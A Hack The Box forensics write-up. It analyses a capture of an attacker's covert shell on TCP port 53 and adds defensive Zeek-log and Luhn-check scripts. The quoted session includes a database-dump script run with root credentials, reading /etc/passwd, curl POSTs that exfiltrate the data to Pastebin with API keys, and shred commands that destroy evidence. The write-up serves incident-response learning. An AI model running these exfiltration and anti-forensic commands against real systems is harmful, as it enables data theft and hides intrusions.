Marshal In the Middle - Hack The Box Write-Up

“The security team was alerted to suspicious network activity from a production web server. Can you determine if any data was stolen and what it was?”

Let's have a look at the files. There is a single folder called "bro". Don't be fooled by the friendly name: Bro was a widely used network intrusion detection system, first released in the late 1990s and renamed "Zeek" in 2018, so this folder holds its log output for the capture. Enough history, we have a case to solve.

First, open chalcap.pcapng in Wireshark. Statistics > Endpoints (and Conversations) gives a quick overview of who talked to whom. Most of the traffic is HTTP/HTTPS on ports 80 and 443, which is what you expect from a web server. On the TCP tab of Conversations, however, one connection stands out.

A TCP connection on port 53 deserves a second look. Port 53 is DNS, and DNS queries and answers normally travel over UDP. TCP on port 53 is not itself illegitimate (it is used for zone transfers and for answers too large for a UDP datagram), but a long-lived TCP/53 session that moves a lot of data to a host that is not a resolver is a classic way to hide a command channel or exfiltration behind a port that firewalls rarely block.
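The same triage can be done from the Zeek ("bro") logs instead of the Wireshark GUI. The script below is an added example, not code from this write-up or from the challenge files: it parses a conn.log by its #fields header and flags TCP sessions to port 53 that Zeek did not classify as DNS, or that run far longer or carry far more bytes than a DNS exchange. The log lines are constructed samples, and the hosts, uids and thresholds are assumptions.

```python
"""Triage a Zeek (formerly Bro) conn.log for TCP sessions on port 53 that do
not look like DNS.

Added example for this write-up; not part of the challenge files. The log
below is a constructed sample in Zeek's default tab-separated format, and the
thresholds are assumptions a real hunt would tune to the environment.
"""
from __future__ import annotations

# Constructed conn.log. Only the columns this script needs are included; real
# files carry more, but Zeek names every column in the #fields header, which
# is what the parser keys on, so extra columns do not matter.
SAMPLE_CONN_LOG = """\
#separator \\x09
#path\tconn
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tduration\torig_bytes\tresp_bytes\tconn_state
#types\ttime\tstring\taddr\tport\taddr\tport\tenum\tstring\tinterval\tcount\tcount\tstring
1600000000.000000\tCa1\t10.0.0.5\t51234\t10.0.0.2\t53\tudp\tdns\t0.012\t45\t61\tSF
1600000001.000000\tCa2\t10.0.0.5\t51235\t10.0.0.2\t53\ttcp\tdns\t0.030\t120\t2048\tSF
1600000002.000000\tCa3\t10.0.0.5\t51236\t203.0.113.7\t53\ttcp\t-\t1843.5\t9120\t31420\tSF
1600000003.000000\tCa4\t10.0.0.5\t51237\t198.51.100.9\t443\ttcp\tssl\t2.1\t800\t12000\tSF
#close\t2020-09-13-12-00-00
"""


def parse_conn_log(text: str) -> list[dict[str, str]]:
    """Parse Zeek TSV into one dict per row, keyed by the #fields names."""
    fields: list[str] | None = None
    rows: list[dict[str, str]] = []
    for line in text.splitlines():
        if not line:
            continue
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
            continue
        if line.startswith("#"):          # #separator, #types, #close, ...
            continue
        if fields is None:
            raise ValueError("data row before #fields header")
        values = line.split("\t")
        if len(values) != len(fields):
            raise ValueError(f"column count mismatch: {line!r}")
        rows.append(dict(zip(fields, values)))
    return rows


def suspicious_port53_tcp(rows: list[dict[str, str]],
                          min_duration: float = 60.0,
                          min_bytes: int = 4096) -> list[dict]:
    """Return TCP/53 rows that do not look like DNS, with the reasons why.

    Plain TCP on 53 is legitimate (zone transfers, truncated answers), so the
    filter keys on what Zeek's analyzers saw: no 'dns' service detected, or a
    session that is far longer or heavier than any DNS exchange should be.
    """
    hits = []
    for r in rows:
        if r["proto"] != "tcp" or r["id.resp_p"] != "53":
            continue
        duration = float(r["duration"]) if r["duration"] != "-" else 0.0
        total = sum(int(r[k]) for k in ("orig_bytes", "resp_bytes")
                    if r[k] != "-")
        reasons = []
        if "dns" not in r["service"].split(","):   # '-' means no service seen
            reasons.append("service!=dns")
        if duration >= min_duration:
            reasons.append(f"duration={duration}s")
        if total >= min_bytes:
            reasons.append(f"bytes={total}")
        if reasons:
            hits.append({**r, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in suspicious_port53_tcp(parse_conn_log(SAMPLE_CONN_LOG)):
        print(hit["uid"], hit["id.orig_h"], "->", hit["id.resp_h"],
              ", ".join(hit["reasons"]))
```

Only the third constructed row is flagged: it is TCP to port 53 on an external host, Zeek saw no DNS in it, it lasted half an hour and moved about 40 KB. That is exactly the conversation that stands out in Wireshark, and the same script works on the real conn.log from the bro folder if you read the file instead of the embedded sample.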

Right-click that conversation (or filter on its IP addresses and ports) and choose Follow > TCP Stream. The reassembled stream contains something very interesting:

It looks like we have found the channel the attacker used! Let's break the session down so we understand it:

  1. ping -c3 mysql-m1.prod.htb: pings the host "mysql-m1.prod.htb" three times, most likely to check that the database server is reachable from the compromised web server.

  2. ./exfildb.sh mysql-m1.prod.htb 3306 root p4ssw0rd dbdump: runs a script named "exfildb.sh" against that host on port 3306 (MySQL) with the credentials root:p4ssw0rd. Going by its name and arguments, it dumps the database to a file.

  3. pastetext=$(cat /etc/passwd): reads the contents of "/etc/passwd" into the shell variable "pastetext".

  4. curl -d "api_user_key=ed67c1aec48d47270dd002d0baa29814&api_dev_key=bb8aa307a7d4b6073976149b65977bae&api_paste_private=2&api_option=paste&api_paste_code=${pastetext}" 'https://pastebin.com/api/api_post.php': makes an HTTP POST to the pastebin.com API that uploads the contents of "/etc/passwd" as a new paste. api_option=paste creates the paste and api_paste_private=2 makes it private, so it is only reachable with those API keys; the attacker is using Pastebin as a drop site.

  5. Next, the attacker tries to read the first four lines of a file named "dbdump" but gets "No such file or directory": the script apparently wrote its output under a different name.

  6. Listing the working directory "/tmp/.h4x" shows the files "dumpdb", "dump_tmp" and "exfildb.sh". A hidden directory under /tmp is a typical staging location.

  7. Reading the first four lines of "dumpdb" succeeds, and the content is credit card data.

  8. The attacker pastes the contents of "dumpdb" to Pastebin the same way, and the API response is a link to the new paste, which confirms the upload went through.

  9. Finally, the attacker changes to the root directory ("/") and uses find together with shred to destroy the files in "/tmp/.h4x". shred overwrites each file before unlinking it, so the data cannot be recovered from disk the way a plain rm would allow. That is anti-forensics, but it only covers the disk: the shell session, the dump and the upload all crossed the network and are still in the capture, and shred gives little assurance on journaling or copy-on-write filesystems anyway.

To answer the challenge question we need the contents of that paste. The traffic to pastebin.com is HTTPS and therefore encrypted in the capture, but we have also been given secret.log, which holds the TLS session secrets. Wireshark's "(Pre)-Master-Secret log filename" setting takes the NSS key log format (one line per session, CLIENT_RANDOM followed by the client random and the master secret in hex, the same file browsers and OpenSSL-based tools write when SSLKEYLOGFILE is set); Wireshark matches each line to a session by the random in the ClientHello and can then decrypt it.

In Wireshark, open Edit > Preferences, expand Protocols, select TLS and set "(Pre)-Master-Secret log filename" to the path of secret.log:

Now that the TLS traffic is decrypted, filter for the Pastebin requests: http.host == "pastebin.com"

As before, follow the stream (this time Follow > HTTP Stream, since the TLS layer has been stripped off).

Keep scrolling through the decrypted POST to the Pastebin API and you will find that juicy flag!
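Once the stream is decrypted, the body of the POST is ordinary form-encoded text, and the question in the challenge brief (was data stolen, and what) comes down to reading the api_paste_code field. The script below is an added example, not part of this write-up or of the capture: it splits a decrypted HTTP request, decodes the form fields and runs a Luhn mod-10 check over the paste to pick out card-number-like values, which is how you would confirm that the second upload really carried card data. The request, the api_*_key values and the card numbers in it are constructed (the cards are publicly known test numbers, not real ones).

```python
"""Recover what was pasted from a decrypted Pastebin API request and check the
paste for card-number-like data.

Added example for this write-up; not part of the capture. The request below is
constructed (the api_*_key values are placeholders and the card numbers are
publicly known test numbers, not real ones).
"""
import re
from urllib.parse import parse_qs

# Constructed paste body: a small CSV as a database dump might look once it
# has been form-encoded. Two of the three numbers pass Luhn, one does not.
_BODY = (
    "api_user_key=00000000000000000000000000000000"
    "&api_dev_key=11111111111111111111111111111111"
    "&api_paste_private=2&api_option=paste"
    "&api_paste_code=id%2Cname%2Ccard%0A"
    "1%2CAlice%2C4111111111111111%0A"
    "2%2CBob%2C5500000000000004%0A"
    "3%2CEve%2C1234567812345678%0A"
)

# Constructed: what the request looks like in Follow > HTTP Stream after the
# TLS layer has been removed.
SAMPLE_REQUEST = (
    "POST /api/api_post.php HTTP/1.1\r\n"
    "Host: pastebin.com\r\n"
    "User-Agent: curl/7.68.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(_BODY)}\r\n"
    "\r\n" + _BODY
)


def split_http_request(raw: str) -> tuple[str, dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (request line, headers, body)."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers found")
    request_line, *header_lines = head.split("\r\n")
    headers: dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers, body


def extract_paste_fields(raw: str) -> dict[str, str]:
    """Decode the form fields of a Pastebin api_post.php request."""
    request_line, headers, body = split_http_request(raw)
    if "/api/api_post.php" not in request_line:
        raise ValueError("not a Pastebin API post")
    if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        raise ValueError("unexpected content type")
    # parse_qs undoes the %XX encoding and returns a list per key; the API
    # sends each field once, so the first value is the one we want.
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def luhn_ok(number: str) -> bool:
    """Luhn mod-10 check, the checksum payment card numbers carry."""
    total = 0
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:                      # every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


# Digit runs of card-number length, not embedded in a longer run of digits.
_PAN_RE = re.compile(r"(?<!\d)\d{13,19}(?!\d)")


def find_card_numbers(text: str) -> list[str]:
    """Return digit runs of card-number length that pass the Luhn check."""
    return [m.group(0) for m in _PAN_RE.finditer(text) if luhn_ok(m.group(0))]


def triage_paste(raw: str) -> dict:
    """Summarise one decrypted upload: its visibility and whether it carried
    card data, which is what the challenge brief asks us to determine."""
    fields = extract_paste_fields(raw)
    paste = fields.get("api_paste_code", "")
    cards = find_card_numbers(paste)
    return {
        "private": fields.get("api_paste_private") == "2",
        "lines": paste.count("\n"),
        "card_numbers": cards,
        "contains_card_data": bool(cards),
    }


if __name__ == "__main__":
    print(triage_paste(SAMPLE_REQUEST))
```

The Luhn filter matters because a database dump is full of long numbers (ids, phone numbers, timestamps); only values that carry the card checksum are reported, so a match is strong evidence rather than a guess. To run it against the real capture, save the decrypted request from Follow > HTTP Stream as text and pass that to triage_paste instead of the constructed sample; the first upload (the /etc/passwd one) will report no card data and the second will.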